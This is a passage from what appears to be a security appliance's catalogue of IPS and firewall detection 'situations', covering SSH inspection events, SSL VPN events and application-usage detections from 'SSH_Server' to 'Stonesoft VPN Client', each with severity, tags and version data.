Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The SSH server provided its public key.
Back to top

SSH_Server_Key_Invalid

About this situation: Server Sent Invalid Key
Context: SSM Context
Severity: 5
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received invalid key from server. Session terminated.
Back to top

SSH_Server_Key_Unknown

About this situation: No Host Key Known
Context: SSM Context
Severity: 1
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: No host key is known and strict checking is enabled. Session terminated.
Back to top

SSH_Server_Signature

About this situation: Server Sent Invalid Signed Packet
Context: SSM Context
Severity: 5
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received invalid signed packet from server. Session terminated.
Back to top

SSH_Short-SSH-Authentication

About this situation: A short SSH connection detected
Context: SSH TCP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Vulnerability: Short-SSH-Authentication
Description:
Back to top

SSH_Solarwinds-Serv-U-FTP-Server

About this situation: SolarWinds Serv-U FTP Server detected.
Context: SSH TCP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-1441-5242
Last changed: sgpkg-ips-1559-5242
Description:
Back to top

SSH_SS-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: SSH TCP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1559-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

SSH_SSHv1-Host-Key-Length

About this situation: Entropy of data sent by SSH client is low
Context: SSHv1 Host Key Length Limits
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: SSH version 1 host used host key of less than 1024 bits. For safety, it is currently encouraged to use SSH host key of at least 1024 bits. Risk analysis: Risk level is low. A too short host key may make the clients vulnerable to IP spoofing attacks. Most relevant log fields: "SSH1 host key min len value" shows the defined minimum allowed host key length in bits. "SSH1 host key bits" shows the detected host key length in bits.
Back to top

SSH_SSHv1-Server-Key-Length

About this situation: Entropy of data sent by SSH client is low
Context: SSHv1 Server Key Length Limits
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: SSH version 1 server used server key of less than 512 bits. For safety, it is currently encouraged to use SSH server key of at least 1024 bits. Risk analysis: Risk level is low. A too short server key may make the clients vulnerable to IP spoofing attacks. Most relevant log fields: "SSH1 server key min len value" shows the defined minimum allowed server key length in bits. "SSH1 server key bits" shows the detected server key length in bits.
Back to top

SSH_Suspicious-Client-Request

About this situation: Detects a suspicious SSH client request
Context: SSH TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-767-5211
Vulnerability: Generic-SSH-Exploit
Description:
Back to top

SSH_Suspicious-Server-Response

About this situation: Detects a suspicious SSH server response
Context: SSH TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-673-5211
Last changed: sgpkg-ips-673-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

SSH_Suspiciously-Large-SSH-Server-Certificate-CVE-2025-26465

About this situation: An attempt to exploit a vulnerability in OpenSSH detected
Context: SSH TCP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSH, CVE2025, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1839-5242
Last changed: sgpkg-ips-1840-5242
Vulnerability: OpenSSH-Man-In-The-Middle-Via-VerifyHostKeyDNS-CVE-2025-26465
Description:
Back to top

SSH_Transport_Error

About this situation: Transport Negotiation Error
Context: SSM Context
Severity: 5
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Transport layer endpoint sent incorrect information. Session terminated.
Back to top

SSH_Transport_Mismatch

About this situation: Transport Negotiation Mismatch
Context: SSM Context
Severity: 5
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Unsupported transport method. Session terminated.
Back to top

SSH_Transport_Negotiation

About this situation: Transport Negotiation Failed
Context: SSM Context
Severity: 5
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Transport layer negotiation failed. Session terminated.
Back to top

SSH_Unknown-Channel

About this situation: SSM SSH Proxy found references to an invalid channel.
Context: SSM Context
Severity: 1
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: An SSH message refers to a channel that is not currently open.
Back to top

SSH_Unknown-Transfer-Type

About this situation: SSM SSH Proxy could not determine the transfer type.
Context: SSM Context
Severity: 1
Tags: SSM SSH Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The SSH Proxy could not determine the transfer type (to or from) of the SCP request; it received an unrecognized executable command from peer. This could be a result of something malicious or use of an unsupported SCP version by the peer.
Back to top

SSH_Vandyke-Securecrt-SSH-Client-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Van Dyke SecureCRT SSH Client detected.
Context: SSH TCP Server Stream
Severity: 7
Tags: Windows, Any Hardware, VanDyke SecureCRT, CVE2002, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-663-5211
Last changed: sgpkg-ips-663-5211
Vulnerability: Vandyke-Securecrt-SSH-Client-Buffer-Overflow
Description:
Back to top

SSH_Version-1.0

About this situation: Detection for usage of SSH version 1.0
Context: SSH Client Version
Severity: 2
Tags: Any Operating System, Any Hardware, Generic SSH server, Any Operating System not specific, Generic SSH server not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-27-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: SSH-Version-1.0
Description:
Back to top

SSH_Violation

About this situation: TCP connection violates SSH protocol
Context: SSH without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-510-5211
Description: A general SSH protocol violation was detected. A general SSH general protocol violation occurs when the inspection module is unable to follow the SSH protocol communication between the client and the server. Risk analysis: Risk varies between low and medium depending on security policy of environment.
Back to top

SSL-2.0

About this situation: Secure Sockets Layer (SSL) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Tunneling
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-595-5211
Description: Secure Sockets Layer (SSL) version 2.0 usage. SSL is predecessor of Transport Layer Security (TLS) protocol.
Back to top

SSL-3.0

About this situation: Secure Sockets Layer (SSL) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Tunneling
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-595-5211
Description: Secure Sockets Layer (SSL) version 3.0 usage. SSL is predecessor of Transport Layer Security (TLS) protocol.
Back to top

SSLpro

About this situation: SSLpro usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1128-5242
Description: SSLpro is a free SSL proxy that can be used to surf the Internet anonymously and to circumvent access limitations.
Back to top

SSLTrust

About this situation: Application SSLTrust detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SSLTrust provides value website security tools to customers around the globe. SSLTrust can help save you both time and money by offering you personalised support in choosing the right product to fit your needs, and whilst installing or setting up your chosen security products.
Back to top

SSLVPN-connection-closed

About this situation: SSL VPN client connection closed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: SSL VPN client connection closed.
Back to top

SSLVPN-connection-done

About this situation: New SSL VPN connection established
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: New SSL VPN connection established. Authentication pending.
Back to top

SSLVPN-DNS-resolution-failed

About this situation: SSLVPN Portal failed to resolve host name
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The SSLVPN Portal failed to resolve the IP address of a web resource using its FQDN.
Back to top

SSLVPN-error

About this situation: SSL VPN error
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: SSL VPN error. Look for description in the information message.
Back to top

SSLVPN-ots-done

About this situation: SSL VPN one-time-session-establishment done
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-1531-5242
Description: SSL VPN one-time-session-establishment done. User authenticated with a valid one time session cookie. The connection is now authenticated.
Back to top

SSLVPN-ots-failed

About this situation: SSL VPN one-time-session-establishment failed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-1531-5242
Description: SSL VPN one-time-session-establishment failed. Unable to authenticate with the provided one time session cookie.
Back to top

SSLVPN-Portal-Inbound-Request

About this situation: SSL VPN Portal client HTTP request
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: SSL VPN Portal client HTTP request
Back to top

SSLVPN-Portal-Inbound-Response

About this situation: SSL VPN Portal HTTP response to client
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: SSL VPN Portal HTTP response to client
Back to top

SSLVPN-Portal-Outbound-Request

About this situation: SSL VPN Portal HTTP request to backend
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: SSL VPN Portal HTTP request to backend
Back to top

SSLVPN-Portal-Outbound-Response

About this situation: SSL VPN Portal HTTP response from backend
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: SSL VPN Portal HTTP response from backend
Back to top

SSLVPN-Portal-Session-Closed

About this situation: SSL VPN Portal user session closed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: SSL VPN Web Portal user session closed
Back to top

SSLVPN-Portal-Transaction

About this situation: SSL VPN Portal HTTP transaction
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: SSL VPN Portal HTTP transaction
Back to top

SSLVPN-re-establishment-done

About this situation: SSL VPN re-establishment done
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: SSL VPN re-establishment done. User authenticated with a valid user session cookie. The connection is now authenticated.
Back to top

SSLVPN-re-establishment-failed

About this situation: SSL VPN re-establishment failed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: SSL VPN re-establishment failed. Unable to authenticate with the provided user session cookie.
Back to top

SSLVPN-SSL-connection-failed

About this situation: SSL connection establishment failed
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: SSL connection establishment failed. An error occurred in the SSL/TLS negotiation, check the information message for a description.
Back to top

SSLVPN-SSO-credentials-added

About this situation: SSL VPN Single Sign-On credential added
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: User credentials for Single Sign-On Service were recorded successfully by the SSL VPN Reverse Web Proxy subsystem.
Back to top

SSLVPN-SSO-credentials-deleted

About this situation: SSL VPN Single Sign-On credential deleted
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: User credentials for Single Sign-On Service were deleted by the SSL VPN Reverse Web Proxy subsystem.
Back to top

SSLVPN-SSO-login-failed

About this situation: SSL VPN Reverse Web Proxy recorded an unsuccessfull Single Sign-On user login attempt
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: There was an unsuccessful Single Sign-On login attempt to SSL VPN Reverse Web proxy subsytem.
Back to top

SSLVPN-user-authentication-done

About this situation: SSL VPN user authenticated successfully
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: SSL VPN user authenticated successfully. The connection is now authenticated.
Back to top

SSLVPN-user-authentication-failed

About this situation: SSL VPN user authentication failed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: SSL VPN user authentication failed.
Back to top

SSLVPN-webservice-access-denied

About this situation: Reverse Web Proxy recorded that access to a web service was denied
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-723-5211
Last changed: sgpkg-ips-723-5211
Description: Access to a web service was denied by the SSL VPN Reverse Web Proxy subsystem.
Back to top

SSLVPN-webservice-access-granted

About this situation: Reverse Web Proxy recorded that access to a web service was granted
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-723-5211
Last changed: sgpkg-ips-723-5211
Description: Access to a web service was granted by the SSL VPN Reverse Web Proxy subsystem.
Back to top

SSLVPN-WR-handshake-failed

About this situation: SSLVPN Portal web resource handshake failed
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: SSLVPN Portal failed to establish TLS handshake with web resource. Some likely causes are cipher suites of both ends do not have overlapping ciphers, TLS supported versions of both ends do not match, web resource is presenting a certificate but not having corresponding private key...
Back to top

SSLVPN-WR-incomplete-cert-chain

About this situation: SSLVPN Portal web resource with incomplete certificate chain
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: SSLVPN Portal failed to access web resource because its certificate chain is incomplete and the SSLVPN Portal does not have the missing certificate in its trusted certificate store.
Back to top

SSLVPN-WR-non-resolved

About this situation: SSLVPN Portal failed to access unresolved web resource
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: SSLVPN Portal failed to access web resource because of its corresponding FQDN was not successfully DNS resolved.
Back to top

SSLVPN-WR-unreachable

About this situation: SSLVPN Portal unreachable web resource
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: SSLVPN Portal failed to access web resource because its IP address is unreachable from the engine.
Back to top

SSLVPN-WR-untrusted

About this situation: SSLVPN Portal untrusted web resource
Context: Firewall Events
Severity: 2
Tags: NGFW
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: SSLVPN Portal failed to access web resource because its certificate is not trusted according to configuration.
Back to top

Stack-Exchange

About this situation: Stack Exchange usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-773-5211
Description: Stack Exchange is a network of question and answer communities.
Back to top

Stack-Overflow

About this situation: Stack Overflow usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-773-5211
Description: Stack Oveflow is a techinal question and answer community.
Back to top

Stackify

About this situation: Application Stackify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Stackify provides software developers, operations and support managers with cloud-based solution that allows to monitor, detect and resolve cloud application to ensure end user experience.
Back to top

Staction

About this situation: Application Staction detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Staction is a simple, but advanced way for groups of people to keep eachother up to date on the work they're doing.
Back to top

Staff-Squared

About this situation: Application Staff-Squared detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Staff Squared - Web based HR management solution.
Back to top

Stagevu

About this situation: stagevu usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Stagevu offers a variety of user-contributed content. Source: Stagevu
Back to top

Stamps

About this situation: Application Stamps detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Stamps.com is a company that provides Internet-based mailing and shipping services.
Back to top

Standard-and-Poors

About this situation: Application Standard-and-Poors detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SandP Dow Jones Indices privides investable and benchmark indices to the financial markets, and global resource for index-based concepts, data and research.
Back to top

Standby Management Server exclusion.

About this situation: Standby management server excluded from replication after timeout without a valid license.
Context: Management Server situation
Severity: 7
Tags: SMC
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1199-5242
Description: Standby server has been running more than half a day without a valid license. Incremental database replication cannot continue.
Back to top

Standing-Cloud

About this situation: Application Standing-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Integrating application software with on-demand infrastructure, deliver an automated application layer for cloud providers, technology solutions providers and ISVs that makes application deployment and management simple for their customers.
Back to top

Standingcloud

About this situation: StandingCloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-713-5211
Description: Standing Cloud allows service providers to deploy and manage applications in the cloud.
Back to top

Staples

About this situation: Application Staples detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Staples Chain store ofers office supplies, technology, printer ink, furniture, cleaning supplies, copy and print services, coffee and snacks and more.
Back to top

Staples-Advantage

About this situation: Application Staples-Advantage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Staples Advantage provides office products to businesses and institutions, account support and customer service
Back to top

StarChapter

About this situation: Application StarChapter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: StarChapter is a member-friendly association management software
Back to top

Stars-Suite

About this situation: Application Stars-Suite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Stars Suite is a comprehensive, Web-based solution featuring adaptive technology and a rigorous curriculum designed to help middle school, high school, and adult learners reach their academic goals.
Back to top

StarterCRM

About this situation: Application StarterCRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Starter CRM manages customers, prospects, contacts, marketing campaigns and tasks in one easy-to-use online system.
Back to top

StartTLS-On-IMAP

About this situation: StartTLS usage detected on IMAP
Context: Application Context
Severity: 1
Tags: Protocols, Mail
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-595-5211
Description: StartTLS usage was detected on IMAP
Back to top

StartTLS-On-POP3

About this situation: StartTLS usage detected on POP3
Context: Application Context
Severity: 1
Tags: Protocols, Mail
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-595-5211
Description: StartTLS usage was detected on POP3
Back to top

StartTLS-On-SMTP

About this situation: StartTLS usage detected on SMTP
Context: Application Context
Severity: 1
Tags: Protocols, Mail
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-1096-5242
Description: StartTLS usage was detected on SMTP.
Back to top

StartUpHire

About this situation: Application StartUpHire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: At StartUpHire we connect exceptional talent with innovative companies. We are the premier destination for jobs within the startup ecosystem. Search thousands of jobs at the world's best startups and find a place where you can contribute, create and innovate.
Back to top

Starwood-Hotels-And-Resorts

About this situation: Starwood Hotels And Resorts usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows users to plan and reserve accommodations. Source: Wikipedia
Back to top

Starz

About this situation: Starz usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1658-5242
Last changed: sgpkg-ips-1663-5242
Description: Starz operates a subscription video over-the-top on demand streaming service. This application situation is meant for blocking the application.
Back to top

StatCounter

About this situation: Application StatCounter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: StatCounter is a web traffic analysis tool. The statistics from StatCounter are used to compute web usage share for example.
Back to top

State-Farm-Insurance

About this situation: Application State-Farm-Insurance detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: State Farm is a group of insurance and financial services companies in the United States.
Back to top

Statista

About this situation: Application Statista detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Statista is the statistics company on the internet that provides to users a tool for researching quantitative data, statistics and related information.
Back to top

StatPro

About this situation: Application StatPro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: StatPro Revolution helps asset managers generate more sales, improve their client service, meet tough regulations and reduce costs.
Back to top

Status Surveillance: inoperative network devices

About this situation: Status Surveillance: inoperative network devices
Context: Other SMC situations
Severity: 8
Tags: SMC
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1296-5242
Description: The listed device(s) have been unreachable to management system for last 15 minutes.
Back to top

Status Surveillance: inoperative security engines

About this situation: Status Surveillance: inoperative security engines
Context: Other SMC situations
Severity: 8
Tags: SMC
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: None of the nodes of the listed cluster(s) have reported operative state to management system within last 15 minutes.
Back to top

Status.io

About this situation: Application Status.io detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Status.io is a service that helps Integrate existing monitoring tools to automate system status page. It shows off response time and metrics.
Back to top

StatusCake

About this situation: Application StatusCake detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: StatusCake enables webmasters to add a website and then track it's status in both performance terms and uptime.
Back to top

Statuspage.io

About this situation: Statuspage.io usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-1764-5242
Description: Statuspage.io is a specialized service that provides tools to generate dynamic status pages and status reporring framework.
Back to top

STC-Cloud

About this situation: Application STC-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: STC Enterprise Cloud Services are utility-based turnkey virtual hosting solutions for the servers and data driving your business.
Back to top

StealthSeminar

About this situation: Application StealthSeminar detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: StealthSeminar - Free Webinar School
Back to top

Stealthy

About this situation: Stealthy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-1128-5242
Description: Stealthy is a web proxy that allows viewing blocked websites. Stealthy is installed as a browser plugin for either Chrome or Firefox.
Back to top

Steam

About this situation: Endpoint Context Agent based Steam
Context: EI Correlation
Severity: 1
Tags: Gaming, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Valve Steam endpoint application has been detected.
Back to top

Steekr

About this situation: Steekr usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a data storage service that allows users to upload, share, and publish files (for example, photos, music, videos, and multimedia files). A mobile or IP TV can also be used to access stored files. Multimedia files can be streamed and played without being downloaded. The SteekR content can be used to populate a blog or an RSS feed. Source: Wikipedia
Back to top

Steelwedge

About this situation: Application Steelwedge detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Steelwedge cloud-based SandOP solutions offer integrated business planning for your sales, finance, operations and executive teams.
Back to top

STEP

About this situation: Application STEP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: STEP Data Management System provides reporting and analysis at the network, district, school, grade, classroom and individual student levels.
Back to top

Steps-Governance-Framework

About this situation: Application Steps-Governance-Framework detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Steps Governance Framework- management software with database, configurable for any business type.
Back to top

SterlingONE

About this situation: Application SterlingONE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sterling Talent Solutions provides accurate criminal background checks, pre-employment screening, drug testing, employee forms and on-boarding services.
Back to top

Stickam

About this situation: Stickam usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Stitch-Labs

About this situation: Application Stitch-Labs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Stitch is an online inventory control solution that simplifies multichannel retail business. It automatically syncs inventory, orders, and sales across channels, which provides retailers a holistic understanding of their operations.
Back to top

Stitcher

About this situation: Stitcher usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Stitcher is an on-demand internet radio service that focuses on news and information radio and podcasts. It provides free online streaming through the website and via native mobile applications such as the Android, BlackBerry, iPhone, and Palm webOS.
Back to top

StockLayouts

About this situation: Application StockLayouts detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: StockLayouts is a graphic design and production company that creates and sells graphic design templates - pre-designed page layouts
Back to top

Stockpair

About this situation: Application Stockpair detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Stockpair is online platform for Binary Options and Pair Options trading. Binary Options and Pair Options are a direct and simple way to trade and profit by predicting the market movements of currencies, stocks, commodities, indices and Pairs of these assets.
Back to top

StockTwits

About this situation: Application StockTwits detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Stocktwits is financial communications platform for the investing community.
Back to top

Stonesoft VPN Client

About this situation: Endpoint Context Agent based Stonesoft VPN Client
Context: EI Correlation
Severity: 1
